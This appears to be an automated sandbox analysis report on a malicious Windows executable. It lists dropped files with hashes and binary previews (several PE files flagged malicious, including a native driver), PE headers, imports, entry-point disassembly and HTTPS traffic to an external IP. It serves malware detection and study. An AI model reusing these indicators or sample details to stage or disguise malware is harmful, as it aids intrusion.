                                    SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                    SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............
                                    Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):10681
                                    Entropy (8bit):7.866148090449211
                                    Encrypted:false
                                    SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                    MD5:10A818386411EE834D99AE6B7B68BE71
                                    SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                    SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                    SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                    Malicious:false
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                    Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):135589
                                    Entropy (8bit):7.995304392539578
                                    Encrypted:true
                                    SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                    MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                    SHA1:561836F6228E24180238DF9456707A2443C5795C
                                    SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                    SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                    Malicious:false
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                    Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):28272
                                    Entropy (8bit):7.711534329290655
                                    Encrypted:false
                                    SSDEEP:384:9BegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQ7:a5F1FUdy422IK+gAZt2i0YPpQn4GMw
                                    MD5:E4C4E6A73941679BB48215B597159789
                                    SHA1:D2BBF3B8E4FF6135B7EFA8F1AFDFDD2A9E25826C
                                    SHA-256:99C352E0F92DB67761BC7B4900EA8888F0315826F40443D04CA520BBF78CDD66
                                    SHA-512:4121824A28D37E26AF284BB84BEDA0B25BB046C3BF7596A4531F28BAE9234C6C05710749EFD5F12AE4466C3B0A70792318439AE82A2E28FD6231B32FA0C112BC
                                    Malicious:false
                                    Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb.(cbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                                    Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):3889557
                                    Entropy (8bit):7.999938753108991
                                    Encrypted:true
                                    SSDEEP:98304:jAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:8ndLOZS/DtpPJRO8OHBL4f2UQI+A
                                    MD5:91D7534FB1B940EF2EF15B260A9CAB5A
                                    SHA1:E74362E001193D482A9149E0A92F3D1513778E3C
                                    SHA-256:42F68359238226E99E6AD7CC9E323EDC91894092B877E98617B9E925438C5353
                                    SHA-512:0EA63527EFEDC3195C4DE8C7FB13A7C0F8691AF3182BBAAC3542969E697BD58B71DCDB9A616ADC47C42BD5CDCCD00F9C03DA0880723C053484E00E21518D1559
                                    Malicious:false
                                    Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q*.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                    Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    File Type:GIF image data, version 89a, 10 x 10
                                    Category:dropped
                                    Size (bytes):8228
                                    Entropy (8bit):7.978918825319935
                                    Encrypted:false
                                    SSDEEP:192:dBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:dBuNhyTlBU2dp+1XrBuCgp9vU0l
                                    MD5:6C080CA12C743137B52A263185421FEE
                                    SHA1:B012ACBBFBF5911D227A21CDA342C17300BD379B
                                    SHA-256:82D49EFF062D49B17FF953666EC21C544DF431DBCDF5477A674A5E7970F7A0EE
                                    SHA-512:7CAC48EC7D599D0110249CC727DD381ECB45E0482C2205083A4D1299976DF14B386078235A7B14D908F990BBEADAB4E065092BDDD4B7761A44F5DACCE3801F7B
                                    Malicious:false
                                    Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI
                                    Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):133136
                                    Entropy (8bit):6.350273548571922
                                    Encrypted:false
                                    SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                    MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                    SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                    SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                    SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse
                                    • Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse
                                    • Filename: 23567791246-764698008.02.exe, Detection: malicious, Browse
                                    • Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse
                                    • Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse
                                    • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                    • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                    • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                    • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                    • Filename: 45631.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):122880
                                    Entropy (8bit):6.002032621557302
                                    Encrypted:false
                                    SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FV:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gV
                                    MD5:9E567BF49FC2FA2792C25E70F8A02ACB
                                    SHA1:0C95555FBCF302535F53BBC463946072F1F968F0
                                    SHA-256:A6BEB87C1252B29F6858B0966B47372E384C1C47A1F51652CDC0AB4B1DBEA13C
                                    SHA-512:25260607E5AFB5AB6DF81BCF4E945282929915C51CAF23D6B4DAEA53FC868366E55FAC785CA2A102288BA63E6C69030AB7A5EF841DE414CC5FE76D956D08BBB8
                                    Malicious:true
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):28272
                                    Entropy (8bit):6.228993159558431
                                    Encrypted:false
                                    SSDEEP:384:h3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/Y:hOUkgfdZ9pRyv+uPzCMHo3q4tDghi
                                    MD5:590DFB7020C5C6797AF92944809004A9
                                    SHA1:B7A7EABF90F5D448A7D227B993B2D3C455398370
                                    SHA-256:494C05125F8986071AD9813D9C5170814BF2DBBDF1E088DC8D53E41EE1AB2BB7
                                    SHA-512:3E95A6836060E68B529F4C0AD057E062814720CA087AD73E96C3C063A594BFA5D3B654F6897B758EC1E49E3070127052D1317A2EAA6EC2AA579F4E5E500492B3
                                    Malicious:true
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...............................................wJ..........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Entropy (8bit):0.11672737241969741
                                    TrID:
                                    • Win64 Executable GUI (202006/5) 92.65%
                                    • Win64 Executable (generic) (12005/4) 5.51%
                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                    • DOS Executable Generic (2002/1) 0.92%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:2o63254452-763487230.06.exe
                                    File size:30'965'248 bytes
                                    MD5:0c3951cfe848ead37f11600ee5195006
                                    SHA1:1f8a4240b5775c7d7c91c0bb48cf2a52df246f5c
                                    SHA256:b0f951ad23e146280e4cdda33f3eb97c99baede4e8429c4366d84971bf8aaeaa
                                    SHA512:7a8f9c8d1330d9746fa26b0bc194a500d3f73df032a829677d667001955fccfc8c7fdaafaf0fcfa06e5edf858d6b86c2399000a4a4b073419c214c2072ea1911
                                    SSDEEP:3072:EoUOpGkDuFdnFYGKLOiLS2iOJJC2jLEfTRoalXzeQGxGVriCW5to3GYVfJ0TFE+/:WT+viOW2nEfTll85twYhE+9hs0
                                    TLSH:A6677B6AB6D050F5D1768174C841A62AF3B27C39072457FF43A4322ADE736E89E3EB50
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........m...>...>...>...?...>...?...>...?...>...?...>...?...>...?...>...?...>...>...>)..?...>).W>...>)..?...>Rich...>........PE..d..
                                    Icon Hash:30f0f0b2b2d2f090
                                    Entrypoint:0x14000751c
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x140000000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                    DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x66A6DF58 [Mon Jul 29 00:16:24 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:d343b90a31fdc2e0ba6252eeff1d2666
                                    Instruction
                                    dec eax
                                    sub esp, 28h
                                    call 00007F724D0F8274h
                                    dec eax
                                    add esp, 28h
                                    jmp 00007F724D0F17D5h
                                    int3
                                    int3
                                    retn 0000h
                                    int3
                                    inc eax
                                    push ebx
                                    dec eax
                                    sub esp, 20h
                                    dec eax
                                    lea eax, dword ptr [000153A7h]
                                    dec eax
                                    mov ebx, ecx
                                    dec eax
                                    mov dword ptr [ecx], eax
                                    test dl, 00000001h
                                    je 00007F724D0F7BCCh
                                    mov edx, 00000018h
                                    call 00007F724D0F7877h
                                    dec eax
                                    mov eax, ebx
                                    dec eax
                                    add esp, 20h
                                    pop ebx
                                    ret
                                    int3
                                    inc eax
                                    push ebx
                                    dec eax
                                    sub esp, 20h
                                    dec eax
                                    mov ebx, ecx
                                    dec eax
                                    mov eax, edx
                                    dec eax
                                    lea ecx, dword ptr [000151D5h]
                                    dec eax
                                    mov dword ptr [ebx], ecx
                                    dec eax
                                    lea edx, dword ptr [ebx+08h]
                                    xor ecx, ecx
                                    dec eax
                                    mov dword ptr [edx], ecx
                                    dec eax
                                    mov dword ptr [edx+08h], ecx
                                    dec eax
                                    lea ecx, dword ptr [eax+08h]
                                    call 00007F724D0F9491h
                                    dec eax
                                    lea eax, dword ptr [00015365h]
                                    dec eax
                                    mov dword ptr [ebx], eax
                                    dec eax
                                    mov eax, ebx
                                    dec eax
                                    add esp, 20h
                                    pop ebx
                                    ret
                                    int3
                                    dec eax
                                    and dword ptr [ecx+10h], 00000000h
                                    dec eax
                                    lea eax, dword ptr [0001535Ch]
                                    dec eax
                                    mov dword ptr [ecx+08h], eax
                                    dec eax
                                    lea eax, dword ptr [00015341h]
                                    dec eax
                                    mov dword ptr [ecx], eax
                                    dec eax
                                    mov eax, ecx
                                    ret
                                    int3
                                    int3
                                    dec eax
                                    sub esp, 48h
                                    dec eax
                                    lea ecx, dword ptr [esp+20h]
                                    call 00007F724D0F755Fh
                                    dec eax
                                    lea edx, dword ptr [0001EA83h]
                                    dec eax
                                    lea ecx, dword ptr [esp+20h]
                                    call 00007F724D0F94F6h
                                    int3
                                    dec eax
                                    sub esp, 48h
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x264100x28.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d840000x7c88.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d820000x18cc.pdata
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d8c0000x660.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x245000x1c.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1c7e00x100.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x1c0000x278.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2629c0x60.rdata
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x1a6300x1a8002e34758538c2804b33adfc8bdef89d52False0.5443230395047169data6.396906534965292IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x1c0000xac760xae007f15e0a0be73072783d6e311a28e0740False0.45492097701149425data5.001537065779476IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x270000x1d5adf80x1d584008bedae8ed9f42ddfe652e147e18c8d44unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .pdata0x1d820000x18cc0x1a00596427158a7635a578c19c41448bf7d7False0.46334134615384615data5.01289537127354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .rsrc0x1d840000x7c880x7e002f3c26b362d5444f973ed4fe3856769dFalse0.5987103174603174data6.192545820714944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1d8c0000x6600x800e7724406b746c340abe120cf92277860False0.55712890625data4.9097899511193095IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x1d841300x3f1bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9801918910554008
                                    RT_ICON0x1d880500x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.1739218877135883
                                    RT_ICON0x1d8a6b80x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.2506830601092896
                                    RT_ICON0x1d8b7e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.4326241134751773
                                    RT_GROUP_ICON0x1d8bc480x3edataEnglishUnited States0.8064516129032258
                                    DLLImport
                                    KERNEL32.dllSetCurrentDirectoryA, GetFileAttributesA, GetModuleFileNameA, SetDllDirectoryA, RaiseException, GetLastError, GetSystemInfo, VirtualProtect, VirtualQuery, FreeLibrary, GetModuleHandleW, GetProcAddress, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, WriteConsoleW, RtlUnwindEx, RtlPcToFileHeader, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, GetStdHandle, WriteFile, GetModuleFileNameW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetFileType, MultiByteToWideChar, WideCharToMultiByte, SetEnvironmentVariableW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetStringTypeW, GetProcessHeap, FlushFileBuffers, GetConsoleCP, GetConsoleMode, GetFileSizeEx, VirtualAlloc, HeapSize, HeapReAlloc, CloseHandle, CreateFileW
                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 9, 2025 01:46:41.872073889 CET5024653192.168.2.4162.159.36.2
                                    Jan 9, 2025 01:46:41.876912117 CET5350246162.159.36.2192.168.2.4
                                    Jan 9, 2025 01:46:41.876975060 CET5024653192.168.2.4162.159.36.2
                                    Jan 9, 2025 01:46:41.881758928 CET5350246162.159.36.2192.168.2.4
                                    Jan 9, 2025 01:46:42.326756954 CET5024653192.168.2.4162.159.36.2
                                    Jan 9, 2025 01:46:42.331773996 CET5350246162.159.36.2192.168.2.4
                                    Jan 9, 2025 01:46:42.331814051 CET5024653192.168.2.4162.159.36.2
                                    Jan 9, 2025 01:47:20.414347887 CET50391443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:20.414390087 CET4435039159.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:20.414479971 CET50391443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:20.422075987 CET50391443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:20.422087908 CET4435039159.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:21.703061104 CET4435039159.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:21.703129053 CET50391443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:21.703953028 CET4435039159.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:21.704009056 CET50391443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:21.762414932 CET50391443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:21.762425900 CET4435039159.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:21.762717009 CET4435039159.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:21.762764931 CET50391443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:21.764278889 CET50391443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:21.811326027 CET4435039159.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:22.101828098 CET4435039159.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:22.101880074 CET4435039159.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:22.102020979 CET50391443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:22.107887030 CET50391443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:22.107901096 CET4435039159.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:22.209060907 CET50403443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:22.209088087 CET4435040359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:22.209166050 CET50403443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:22.209357977 CET50403443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:22.209368944 CET4435040359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:23.434973955 CET4435040359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:23.436279058 CET50403443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:23.436810970 CET50403443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:23.436819077 CET4435040359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:23.437009096 CET50403443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:23.437012911 CET4435040359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:23.778619051 CET4435040359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:23.778634071 CET4435040359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:23.778680086 CET50403443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:23.778686047 CET4435040359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:23.778697014 CET50403443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:23.778726101 CET50403443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:23.779316902 CET4435040359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:23.779366016 CET50403443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:23.793853998 CET4435040359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:23.793909073 CET50403443192.168.2.459.110.190.44
